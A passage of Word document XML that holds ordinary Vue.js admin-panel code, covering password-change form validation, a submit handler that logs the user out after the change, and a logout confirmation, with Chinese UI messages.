        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    repassword: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0A473" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1D333" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            required: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31303C72" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>确认密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228BB0FD" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            trigger: 'blur'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6411B000" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599E4E4" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEEC017" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C1437" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB03DFF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const formRef = ref(null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A474C6F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4C0E46" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const loading = ref(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC65FF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4871EE48" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const onSubmit = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF29BB" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    formRef.value.validate((valid) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0780C227" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (valid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A51620" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // console.log('submit!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EC029" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            loading.value = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192ECC86" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            updatePassword(form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368EC2D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39365D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    toast("</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修改密码成功，请重新登陆</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>", "success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE77A95" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    showDrawer.value = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17567615" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    store.dispatch("logout")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFCAFD6" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        .finally(() =&gt; location.reload())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF28506" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    router.push("/login")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E620C1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B836368" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                .finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8957B7" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    loading.value = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6AD2B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E3278" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC31C5B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6723A526" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8397B1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F48EE" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A062C90" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E861D5" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const handleCommand = (c) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FE1A33" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    switch (c) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393FC6A2" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        case "logout":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3FFDA" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            handleLogout()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B4794" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5DC7F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        case "rePassword":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3608C4E9" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            showDrawer.value = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0976F125" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330DCB65" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340A8F3" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529E4226" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C9DC6" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281D72F9" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD07D39" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3560A11D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const handleRefresh = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5711B238" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // router.go(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF02A2" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5844D718" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC902E" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B341418" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>function handleLogout() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F3BF53" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    showModal("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否要退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFFAE7D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5DB5C" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // console.log("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D2C44" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            logout()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8105B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .then()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88633A" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .catch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A537EC3" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0032DEC1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A983268" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
